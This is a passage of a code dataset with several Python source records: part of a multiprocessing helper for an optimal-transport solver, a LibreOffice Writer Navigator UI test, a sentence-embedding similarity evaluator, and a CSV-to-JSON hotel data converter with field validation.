dim = arg['dim'], length = lenX) \r\n if 'mu' in arg.keys():\r\n arg['mu'] = sparsify(mu, structure_matrix, k) \r\n if 'p_phi' in arg.keys():\r\n arg['p_phi'] = sparsify(p_phi, structure_matrix, k) \r\n if 'p_h_sparse' in arg.keys():\r\n arg['p_h'] = sparsify(p_h_sparse, structure_matrix,\r\n k, dim = arg['dim'], length = lenX)\r\n package.append(auxiliary(index, arg))\r\n return package\r\n\r\n \r\n \r\ndef action_pool(auxiliary = None, apply_elem = None, axis = None,\r\n base_arg = None, var = None, code_name = \"\"):\r\n tasks_per_thread = base_arg['tasks_per_thread']\r\n nb_threads = base_arg['nb_threads']\r\n use_pool = base_arg['use_pool']\r\n print_time_pool = base_arg['print_time_pool']\r\n sparse_is_on = base_arg['sparse_is_on']\r\n if axis == 'x':\r\n total_len = base_arg['lenX']\r\n if sparse_is_on:\r\n base_arg['sparse_gridYX'] = None\r\n elif axis == 'y':\r\n total_len = base_arg['lenY']\r\n if sparse_is_on:\r\n base_arg['sparse_gridXY'] = None\r\n else:\r\n raise ValueError(\"Axis \"+str(axis)+\" does not exist.\") # fix: a bare-string raise is a TypeError in Python 3\r\n numb_paral = tasks_per_thread*nb_threads\r\n size_job = int(math.ceil(total_len*1./numb_paral))\r\n gf.check(numb_paral*size_job>=total_len,(numb_paral,size_job,total_len))\r\n args = []\r\n base_arg['auxiliary'] = auxiliary\r\n base_arg['size_job'] = size_job\r\n base_arg['total_len'] = total_len\r\n base_arg['axis'] = axis\r\n for j in range(numb_paral):\r\n i_0 = j*size_job\r\n if i_0 >= total_len:\r\n break\r\n base_arg['i_0'] = i_0\r\n arg = dict(base_arg)\r\n if sparse_is_on:\r\n iplus = min(total_len, (j+1)*size_job)\r\n if axis == 'x':\r\n arg['sparse_gridXY'] = arg['sparse_gridXY'][i_0:iplus]\r\n elif axis == 'y':\r\n arg['sparse_gridYX'] = arg['sparse_gridYX'][i_0:iplus]\r\n args.append(arg) \r\n \r\n if use_pool:\r\n pool = Pool(nb_threads)\r\n t_0 = timeit.default_timer()\r\n results = list(pool.map(auxiliary_package, args))\r\n pool.close()\r\n pool.join()\r\n time_pool = timeit.default_timer()-t_0\r\n if print_time_pool:\r\n print(\"time for poolmap \"+code_name, time_pool)\r\n else:\r\n t_0 = timeit.default_timer()\r\n results = list(map(auxiliary_package, args))\r\n if print_time_pool:\r\n print(\"time for map \"+code_name,timeit.default_timer()-t_0)\r\n \r\n total_time = 0.\r\n for elems in results:\r\n for elem in elems:\r\n var = apply_elem(elem, var)\r\n total_time += elem['time_comp'] \r\n \r\n if use_pool:\r\n var['stop_pool'] = False\r\n if total_time < time_pool:\r\n var['stop_pool'] = True\r\n if print_time_pool:\r\n print(\"sum of computation times for \"+code_name+\" = \", total_time)\r\n return 
var\r\n\r\n","repo_name":"hadrien-de-march/MOT_resolution","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":62120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29169664490","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\nfrom uitest.framework import UITestCase\nfrom libreoffice.uno.propertyvalue import mkPropertyValues\nfrom uitest.uihelper.common import get_state_as_dict, get_url_for_data_file\n\nclass tdf40427(UITestCase):\n\n def get_item(self, xTree, name):\n for i in xTree.getChildren():\n xItem = xTree.getChild(i)\n if name == get_state_as_dict(xItem)['Text']:\n return xItem\n\n def expand_all(self, xTreeItem):\n count = len(xTreeItem.getChildren())\n for i in xTreeItem.getChildren():\n xTreeItem.getChild(i).executeAction(\"EXPAND\", ())\n count += self.expand_all(xTreeItem.getChild(i))\n return count\n\n def get_names(self, xTreeItem):\n names = []\n for i in xTreeItem.getChildren():\n names.append(get_state_as_dict(xTreeItem.getChild(str(i)))['Text'])\n names += self.get_names(xTreeItem.getChild(i))\n return names\n\n def test_tdf40427(self):\n with self.ui_test.load_file(get_url_for_data_file(\"tdf40427_SectionPositions.odt\")) as document:\n xMainWindow = self.xUITest.getTopFocusWindow()\n xWriterEdit = xMainWindow.getChild(\"writer_edit\")\n\n self.assertEqual(2, document.CurrentController.PageCount)\n\n # Make sure that the view is 2 pages side-by-side - look at dialog View-Zoom-Zoom\n with self.ui_test.execute_dialog_through_command(\".uno:Zoom\") as xDialog:\n\n columnssb = xDialog.getChild(\"columnssb\")\n columns = xDialog.getChild(\"columns\")\n bookmode = xDialog.getChild(\"bookmode\")\n self.assertEqual(\"true\", get_state_as_dict(columns)[\"Checked\"])\n self.assertEqual(\"2\", get_state_as_dict(columnssb)[\"Text\"])\n self.assertEqual(\"false\", get_state_as_dict(bookmode)[\"Selected\"])\n\n\n # In this view, the sections \"SectionB\" and \"SectionC\" on second page are positioned on screen\n # higher than \"SectionY\" and \"SectionA\" respectively; there are nested and anchored sections.\n # Make sure that order in Navigator follows their relative position in document, not vertical\n # position on screen, nor sorted alphabetically. 
Sections in flying frames are sorted by their\n # anchor position in the document.\n\n self.xUITest.executeCommand(\".uno:Sidebar\")\n xWriterEdit.executeAction(\"SIDEBAR\", mkPropertyValues({\"PANEL\": \"SwNavigatorPanel\"}))\n\n # wait until the navigator panel is available\n xNavigatorPanel = self.ui_test.wait_until_child_is_available('NavigatorPanel')\n\n xContentTree = xNavigatorPanel.getChild(\"contenttree\")\n xSections = self.get_item(xContentTree, 'Sections')\n self.assertEqual('Sections', get_state_as_dict(xSections)['Text'])\n xSections.executeAction(\"EXPAND\", ())\n totalSectionsCount = self.expand_all(xSections)\n\n refSectionNames = [\n 'SectionZ',\n 'SectionY', # SectionB should not get before this, despite its Y position on screen is higher\n 'SectionT3', # Sections in tables go in rows, then across rows\n 'SectionT1',\n 'SectionT2',\n 'SectionT0',\n 'SectionF2', # Goes before SectionF1, because their fly anchors go in that order\n 'SectionF3', # Same as SectionF1, but anchor section is in fly itself\n 'SectionFinF3', # Check order of nested sections inside fly\n 'SectionA',\n 'SectionF1', # Section in fly anchored in a section goes immediately after its anchor section\n 'SectionB', # High on screen, but late in list because it's on second page\n 'SectionC',\n ]\n self.assertEqual(len(refSectionNames), totalSectionsCount)\n\n actSectionNames = self.get_names(xSections)\n\n # Without the fix in place, this would fail with\n # AssertionError: Lists differ: ['SectionZ', 'SectionY', 'SectionT3', 'SectionT1', 'SectionT2'[100 chars]onC'] != ['SectionZ', 'SectionB', 'SectionF3', 'SectionFinF3', 'Section[100 chars]onA']\n self.assertEqual(refSectionNames, actSectionNames)\n\n self.xUITest.executeCommand(\".uno:Sidebar\")\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sw/qa/uitest/navigator/tdf40427.py","file_name":"tdf40427.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"9764198255","text":"import sentencepiece as spm\nimport numpy as np\nfrom sacremoses import MosesTokenizer\n\ndef cosine(u, v):\n return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))\n\nclass FileSim(object):\n\n def __init__(self):\n self.similarity = lambda s1, s2: np.nan_to_num(cosine(np.nan_to_num(s1), np.nan_to_num(s2)))\n\n def score(self, params, batcher, f):\n f = open(f, 'r')\n lines = f.readlines()\n input1 = []\n input2 = []\n for i in lines:\n i = i.strip().split(\"\\t\")\n s1 = i[0].strip()\n s2 = i[1].strip()\n input1.append(s1)\n input2.append(s2)\n sys_scores = []\n for ii in range(0, len(input1), params.batch_size):\n batch1 = input1[ii:ii + params.batch_size]\n batch2 = input2[ii:ii + params.batch_size]\n\n # we assume get_batch already throws out the faulty ones\n if len(batch1) == len(batch2) and len(batch1) > 0:\n enc1 = batcher(params, batch1)\n enc2 = batcher(params, batch2)\n\n for kk in range(enc2.shape[0]):\n sys_score = self.similarity(enc1[kk], enc2[kk])\n sys_scores.append(sys_score)\n\n return sys_scores\n\ndef batcher(params, batch):\n batch = [\" \".join(s) for s in batch]\n new_batch = []\n for p in batch:\n if params.tokenize:\n tok = params.entok.tokenize(p, escape=False)\n p = \" \".join(tok)\n p = p.lower()\n p = params.sp.EncodeAsPieces(p)\n p = \" \".join(p)\n new_batch.append(p)\n vecs = params.embedder.embed(new_batch, params.encoder)\n return vecs\n\ndef evaluate(embedder, args):\n\n sp = 
spm.SentencePieceProcessor()\n sp.Load(args.sentencepiece)\n\n entok = MosesTokenizer(lang='en')\n\n from argparse import Namespace\n\n new_args = Namespace(batch_size=32, entok=entok, sp=sp, embedder=embedder,\n encoder=args.eval_encoder, tokenize=args.tokenize)\n\n s = FileSim()\n scores = s.score(new_args, batcher, args.sim_file)\n\n f = open(args.sim_file, 'r')\n lines = f.readlines()\n\n for i in range(len(scores)):\n print(lines[i].strip() + \"\\t{0}\".format(scores[i]))\n\n\nif __name__ == '__main__':\n\n from embed import Embedder\n from fairseq import options\n\n parser = options.get_generation_parser(interactive=True)\n args = options.parse_args_and_arch(parser)\n\n embedder = Embedder(args)\n\n evaluate(embedder, args)\n","repo_name":"jwieting/bilingual-generative-transformer","sub_path":"evaluate_list.py","file_name":"evaluate_list.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"23712423834","text":"#!/usr/bin/env python\n\"\"\"\nScript to convert CSV input data in JSON\n\"\"\"\nfrom __future__ import print_function, division\nimport sys\nimport operator\nimport csv\nimport logging\nimport timeit\nimport t4c.t4c_exceptions as t4c_ex\nimport t4c.validate as validate\nimport t4c.util as util\n\n# ---\n# TODO unit test (pytest)\n# TODO support yaml - pyYaml\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\n\ndef read_and_parse(source_file, complex_url_validation):\n \"\"\"\n Reads source `filename` and returns a tuple with 2 elements\n 0 - list with CSV Fields names\n 1 - List of Dicts with all the row-elements\n It raises IOError exception `filename` cannot be read\n \"\"\"\n try:\n with open(source_file, mode='r') as hotels_file:\n reader = csv.DictReader(hotels_file, delimiter=',')\n data = []\n not_valid = []\n for row in reader:\n try:\n LOGGER.debug(str(len(data)) + ' - ' + row['name'] + ' - ' + row['uri'])\n data.append(validate_data(row, complex_url_validation))\n # for test\n # if len(data) >= 100:\n # break\n\n except t4c_ex.GenericT4cError:\n not_valid.append(row)\n return reader.fieldnames, data, not_valid\n except IOError as ioe:\n raise IOError(\"!!! 
- ooops I cannot read {} or it does not exists\".format(ioe.filename))\n\n\ndef validate_data(current_row, complex_url_validation):\n \"\"\" this function is currently quite 'dumb'\n using hard-coded values and triggering the right validation \"\"\"\n try:\n current_row['name'] = util.is_a_utf8_string(current_row['name'])\n current_row['address'] = current_row['address']\n current_row['stars'] = validate.rating_validation(current_row['stars'])\n current_row['contact'] = current_row['contact']\n current_row['phone'] = current_row['phone']\n current_row['uri'] = validate.url_validation(current_row['uri'], complex_url_validation)\n return current_row\n except (t4c_ex.StarsValidationError, t4c_ex.UriValidationError, t4c_ex.NotUTF8Error) as exc:\n LOGGER.error(exc.message)\n raise t4c_ex.GenericT4cError\n\n\ndef write_data(data_parsed, destination_json, sort_by_field, fields_name):\n \"\"\"The method that writes data in JSON files\n and check for sorting field\"\"\"\n if sort_by_field != 'None':\n data_parsed.sort(key=operator.itemgetter(\n validate.field_exists_in_csv_fields(sort_by_field, fields_name)))\n util.write_json_to_file(data_parsed, destination_json)\n\n\ndef main():\n \"\"\"The main method \"\"\"\n\n args = util.args_parser.parse_cli()\n destination_json = args.destination_file\n failed_validation_file = util.file_checks.get_invalid_hotels_file()\n source_file = args.source_file\n sort_by_field = str(args.sort_by_field)\n overwrite_destination = validate.cast_str_2_boolean_argument(args.overwrite_destination_file)\n complex_url_validation = validate.cast_str_2_boolean_argument(args.complex_url_validation)\n\n if LOGGER.level == logging.DEBUG:\n for arg in vars(args):\n LOGGER.info(\"Starting with parameters: {} - {}\".format(arg, getattr(args, arg)))\n LOGGER.info(\"\\n################################\\n\")\n\n util.write_existing_file(overwrite_destination, destination_json)\n\n st1 = timeit.default_timer()\n # let's crack this down :)\n data_read_and_parsed = read_and_parse(source_file, complex_url_validation)\n fields_name = data_read_and_parsed[0]\n data_processed = data_read_and_parsed[1]\n data_failed_validation = data_read_and_parsed[2]\n\n # Finally Write data\n write_data(data_processed,\n destination_json, sort_by_field, fields_name)\n # for the time being to make it simple, Always overwrite invalid hotels' file\n write_data(data_failed_validation,\n failed_validation_file, sort_by_field, fields_name)\n\n st2 = timeit.default_timer()\n\n LOGGER.info('\\n\\n#############################################')\n LOGGER.info(\"I saved and validated {} hotels in {} seconds\"\n .format(len(data_read_and_parsed[1]), st2-st1))\n LOGGER.info(\"Unfortunately {} hotels did not pass the validation\"\n .format(len(data_failed_validation)))\n LOGGER.info(\"You can find all the generated data inside {}\".format(util.get_data_folder()))\n\n\nif __name__ == '__main__':\n try:\n t1 = timeit.default_timer()\n main()\n LOGGER.info(\"Overall script took: {} seconds\".format(timeit.default_timer() - t1))\n except (GeneratorExit, IOError, RuntimeError) as error:\n print(error)\n sys.exit(1)\n","repo_name":"zimaldone/t4c","sub_path":"t4c.py","file_name":"t4c.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
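Editor's addition: a minimal, self-contained sketch of the read-validate-sort-write flow that the t4c.py record above implements. The hotel field name, the 0-to-5 stars rule, and the file names are illustrative assumptions, not the project's actual validators (those live in t4c.validate and t4c.util).

import csv
import json
import operator

def convert(source_csv, destination_json, sort_by='name'):
    # Read rows as dicts keyed by the CSV header, splitting valid from invalid
    valid, invalid = [], []
    with open(source_csv, newline='') as f:
        reader = csv.DictReader(f)
        for row in reader:
            try:
                stars = int(row['stars'])      # illustrative rule: ratings must be 0..5
                if not 0 <= stars <= 5:
                    raise ValueError(row['stars'])
                row['stars'] = stars
                valid.append(row)
            except (KeyError, ValueError):
                invalid.append(row)            # kept separately, like the invalid-hotels file
    valid.sort(key=operator.itemgetter(sort_by))
    with open(destination_json, 'w') as out:
        json.dump(valid, out, indent=2)
    return len(valid), len(invalid)

# convert('hotels.csv', 'hotels.json')  # hypothetical file names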